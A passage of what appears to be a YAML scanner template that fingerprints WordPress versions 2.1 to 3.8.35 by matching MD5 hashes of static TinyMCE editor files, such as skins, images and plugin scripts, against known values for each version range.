"(\"8c9b1f0ee9deb6374983650edbd6ddfc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ui_black.css" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"02a164ba69ca7d9182047b24944e1d69\" == md5(body))" - - type: dsl - name: 2.7 - 3.1.4 - dsl: - - "(\"dd03578fd4e33798de6d86c4564e4c66\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"41aa12855030ea15a9bb709c8cef254a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/quicktime.gif" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"61da1ff8729ca5016344c4e8eb173369\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"9a6a9fdead205b125c07ea37e71ed4f1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/shockwave.gif" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"1ce7d48784981aac9d4375cf2effdc4d\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"baa643b587565755157618032dc93e3c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/iframe.gif" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"a1af02e9ba370f64297087b46e80591e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/realmedia.gif" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"b9734ee16d790e67bea01046feba28b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/trans.gif" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/colorpicker.jpg" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"9bcc36292defe94bca5a013a1736c7d7\" == md5(body))" - - type: dsl - name: 2.5 - 3.2.1 - dsl: - - "(\"02ae48639aa5729e6a40fb64455c32a2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/gotmoxie.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"d97b715d73a13adef309a8a7103acb45\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"c1fb3ef2ad854a88d9eb8ee32d15e4ad\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/flash.gif" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"33adee48d32bbbba3e6412cc54ecf335\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"6c69b02015d09280332ff8b07e4ea2f3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/windowsmedia.gif" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"c327cd167b3a7bc263d908b0d0154ead\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/pagebreak.gif" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"48872075f721bf57a517e3275d61c0ba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/video.gif" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"f85c56813ea016a75e496bba50d66ab4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/icons.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"75ad72872bc6280c32609e12fc3b610a\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"7316b39211892b53eac6f76da7615461\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"092b023d8d0073b8f651a92a1f711ccd\" == md5(body))" - - type: dsl - name: 2.6 - 3.0.6 - dsl: - - "(\"e893a1f9e0c9c6240ba28756cf838f5f\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"79fd242f30fe7c067cdd1a2819286d96\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/shortcuts.htm" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"9c5c4d7c3345923401c87d000c16fffc\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f938d4898b708a597605e6fa94e09f98\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"76ce06e62540684000cc9c46aae4474f\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"27719aba1a5b5cd66f21dc6396db11c8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/editor_template_src.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"ebe2e88379da04870256a02af4d11660\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"682e22af10a0275e385f6ea70edca5ec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/about.js" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"4ae895d8be28f8b94dd4f5d206cd7d59\" == md5(body))" - - type: dsl - name: 2.7 - 3.1.4 - dsl: - - "(\"cd4f25e57d9c7c3c5eaed2b4234c8787\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"fb6dfda2a5bbf17d943427a5d18f2f95\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/charmap.js" - matchers: - - type: dsl - name: 3.4 - 3.8.35 - dsl: - - "(\"23e6f0fdded2c9fd69ba1fd7d69f559a\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"dd98a4a6232979fcc260e47ca0dc831c\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f816574961189f44e338076169d21d1f\" == md5(body))" - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"27f30d99721bd0ff665a443c49a22702\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/color_picker.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"cfc0f59a846661e748cae1c0adca77dc\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"dabce3953a51e33865ec851680ef8e66\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"f2be5a5b4fa75f5024b4da7c48b6220a\" == md5(body))" - - type: dsl - name: 2.6 - 3.1.4 - dsl: - - "(\"2ce934aa3086cba10c51c6d055177f8f\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"a070e37ba9fa90f524d7ba237b075ff9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/source_editor.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"2a9abbfa6e2ade2906839928c6728d0a\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"f1199e7f280cb16315ce96b57c132b46\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"fc7ac5c28594efaaf39bcf1ddadd9856\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"cd02d9651fd1f076f4ac5d7d7961bd58\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"4b3abeb1908bef7872238e184a5a40d9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/js/anchor.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"f69b824ff2b94f22713614c2dc5992e0\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"4a93a690b2394eb2a6c9d2cdda9c3724\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"7da0063f892dbbfe65fce99c5a31092a\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"fda96d6d56eefb394e13c1bc1cb8619d\" == md5(body))" - - type: dsl - name: 2.5 - 3.0.6 - dsl: - - "(\"8988b8d83a5d753ddcb3600b976780fd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/mark_loaded_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"470585e89c34ba73b4b5b0c820847eb1\" == md5(body))" - - type: dsl - name: 3.4 - 3.7.35 - dsl: - - "(\"e44f09fb83377ffdc1157b458e43414f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/editor_plugin.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"629a571ee7686ace6ee7ad1181be916b\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"750c7ce89a12d3feb9581048b191b306\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"50a890efd0b000bebf8f59be18b4756e\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"bf331fd1784c21ad46d5476b9a0d2bf6\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"7b87925059f743fde748249a86023382\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"a9338da99929e597afc66c47f896f19d\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"1cb7ad26e99573dae76e9db4bf8eacae\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"0712d6f4126a024e78ae414d0f9eb26e\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"59deb149274a5e866ad189584400ea7a\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"a23620f619ed83c84c36d30ce50d888a\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"7184878c54ac0ad03d1c3991e53fc48e\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"16790290584c848e3c1661a19b5fb8dc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt" - matchers: - - type: dsl - name: 3.3 - 3.8.35 - dsl: - - "(\"b37d71f086003790ea5bb7bb390b6514\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"47521cae14f8ff1d8f0438c4eece96dd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"8b752a82741c05573b7591571a73238a\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"dfd90ec4732fbd422523c8264d9c6618\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"4a1ccb08ad7a42be05124e2db14dc558\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/img/wline.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"c136c9f8e00718a98947a21d8adbcc56\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/css/content.css" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"d236d4333281b4eae7a1e2b514b691f4\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"8d6e330ef6a597e6e4cbd34dd1142d55\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"72331b2dc8d86d4a5d735a6a81b64240\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/editor_plugin.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"e7e3089339dc85691bed70d81734accd\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"ace4ee20adc97976943071a23a644834\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"027f347c2e18dc9d6baa32a2b3b91ba3\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"55ff6649d76ef9f00ab07bd042c04080\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"48b93f5e8a259e79260d20c0f058c3e4\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"96c894139b58313c7db685343689df3e\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"e203448d1abcf685301d3f6a24251ced\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"5b145b1c56b55c90b4aea900fce25880\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"cf113c3a5323ea17b16af7793a8044bf\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"c29b7af54a61d8a5fd8ad8940a952cc0\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"01d4facd6dac7390c24b0fc432123111\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"21ceba9d264d698cfcc0c19ca1b0552a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"2a403fc1f292458b7e9a323901e9d171\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f99e775a94ebccd2e099282fed60f79f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/js/pasteword.js" - matchers: - - type: dsl - name: 2.9 - 3.8.35 - dsl: - - "(\"10f73efbf570633989e2801d0b10de4f\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"179e37760324b39e7d41b61bc707abb3\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"7f69babced989fb799e0f7a617441c71\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/js/pastetext.js" - matchers: - - type: dsl - name: 2.9 - 3.8.35 - dsl: - - "(\"69ba0c60f23785b0c60e56b1919e53fa\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"9db07e9a6d27f06ee292ee9d0793a725\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"05482c276313c900e2a2b55508712b13\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"c59d928618f4eb94397ba801a3c100cb\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"a5356abede54850eae9c4444bb914750\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"393aaad342ffa662acffe4b7ebd77fe1\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9518d57cd71cab0e2e1b792c8f2e7afb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"de3ad9d8c97491f41feaaf5d5d4d60b5\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"47e03ab3c3dffa3156931d74ef44d52b\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"1ce500bae8c6556682d15c05171b53ee\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"9e19bedfc3e87227a024cda58a0266f4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/delete-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"fc29fcdb63500be0c6096b4621840f24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/delete.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"6de18e0045263b20400e284eb2731939\" == md5(body))" - - type: dsl - name: 2.6 - 3.4.2 - dsl: - - "(\"748b2a72b7e2aeec7e32f3f1846b5ff9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/image.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"528e8e81d99bf63d0b7f88bdd0051d3a\" == md5(body))" - - type: dsl - name: 2.6 - 3.4.2 - dsl: - - "(\"a7a2baa789bbfef570b3c4be0a838ebd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/img/image-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"e122da77cc3ef946e42cf76288800cba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/css/editimage.css" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"be84c8843d5da59cde1aaa472acf86a6\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7b6706be2029b702630f0d14ca83bdc4\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"24f7a66d3de202e80523d0d1ded072b8\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"f3965730983a5b39b3d61af55ea2977e\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"316db36315e941a43831b726bc7cc7ad\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"3223cb47ddd88a68afddd68174432e02\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/fullscreen/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"dae63ddab5c4a9fee69fe36e4f2558a3\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"bab6098141b6550727394f2a52fb0aba\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"bd6ef90e8f4138ebb23f18b3c69b67c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"877c47e5ec852d4446782f56cd7fda90\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"fdfef23447596978a7af1c589a704bd3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/button.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"19f864cb81177840dcd534df4d537ea3\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"9e911a2c3cb4720d44844ef2d1832a51\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/confirm.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"1bc337a20c319e531cda6ced531827d0\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"44f1d55b14fbc66b98f3899d90611c3c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/drag.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"5847788e8ae098dd7fc3bdbe1a084da6\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"c8984e70b184ca51bc427aa106c29453\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/alert.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"568d4cf84413656fb72fe39d1dd60f8d\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"56646a5e811547c8bc3d1b9790496b89\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/horizontal.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"0365e75dd4a9ad61dc98dcb641207c21\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/vertical.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"0261136fac58ce77bdbd96aa0194947e\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"193884a332e91059643448ed4bde2e04\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/corners.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"55298b5baaecb7e06a251db9f0a4b14c\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"2e89a17a473f0e488f3e789ce998f064\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/buttons.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"2e101a4aa637bfd16cef7e763e8c2eed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.4 - 3.8.35 - dsl: - - "(\"50960b97a8030fd80d582166fef4ab57\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"e598b8a8f94830e55c044ee7b6dd7bf0\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"b1f0a677a64e08005a093b4049f54d53\" == md5(body))" - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"c6407f04ec80e657ba01bf5938a60faa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"76bd5bbf6dd69ef9a02cf6c0ed45453d\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"bfcceea9af0abd6cca120cbdd76af2f2\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"0c8c4f07f089e8ae86166ab16201cda9\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9dd84d5a159ba243f18568c223a534b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"90e1aaca98ff9c022b8b92e5a4f95c60\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"a6438b9df6aa7af17ad9c1ca2019d014\" == md5(body))" - - type: dsl - name: 3.4 - 3.5.2 - dsl: - - "(\"48784cf4970b78b03ce5d6da9cac5621\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"6ceb647592588bcf463befd9408e27ad\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"6ec150b7987caaef98b59c87b9f471be\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"ed402838f592c94f7193ea14f8b6080d\" == md5(body))" - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"a38ac5266924938a4ff5514369c6b40d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.min.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"11c54c73d65807fda84de489cc293213\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"6f509c02257266b9ae4b7686b348b6e9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"a385e127675754d68ba3ee7f2e52000c\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"5839f864d7d49087233bd5d757c1dce0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/js/popup.min.js" - matchers: - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"63b0aed9b02f879a6e0295fbea7db854\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"a38ac5266924938a4ff5514369c6b40d\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.8.35 - dsl: - - "(\"e66d35d1f2662ffef10de09a788a5ac1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"4c0617745b1e12ce03667fa18ab4653f\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"1b2c3742258f2159bfe1c3d5bd3c3d25\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e61dbbc27d24dcdf7dd27875920e202d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"c0e1697f5027204a9a8409f4048a1150\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/edit.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"42a45087214d7c886a308fd83406d60d\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"9554f2aa129d2d01e247a73669bb832d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/delete-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"fc29fcdb63500be0c6096b4621840f24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/t.gif" - matchers: - - type: dsl - name: 2.7 - 3.8.35 - dsl: - - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/delete.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"6de18e0045263b20400e284eb2731939\" == md5(body))" - - type: dsl - name: 2.7 - 3.4.2 - dsl: - - "(\"748b2a72b7e2aeec7e32f3f1846b5ff9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/img/edit-2x.png" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"55706c78fac741908045b68213df637f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"3f0d7eef1ba22024488ddffcb3bb0e55\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"30d8cd0fe92587476fab267f2598ad7d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"0a4a9b17e7640d4a0b7ed0b1404c89da\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/css/media.css" - matchers: - - type: dsl - name: 3.2 - 3.8.35 - dsl: - - "(\"4e29dd1bf318a62f0b5d39dc610e5f82\" == md5(body))" - - type: dsl - name: 2.6 - 3.0.6 - dsl: - - "(\"51795abbefc981b9f77083afd672a495\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"05c0940b9d0db9e52175d4b2e3b330c2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/js/embed.js" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"5df3783492b848adde42124a1e9cf383\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/js/media.js" - matchers: - - type: dsl - name: 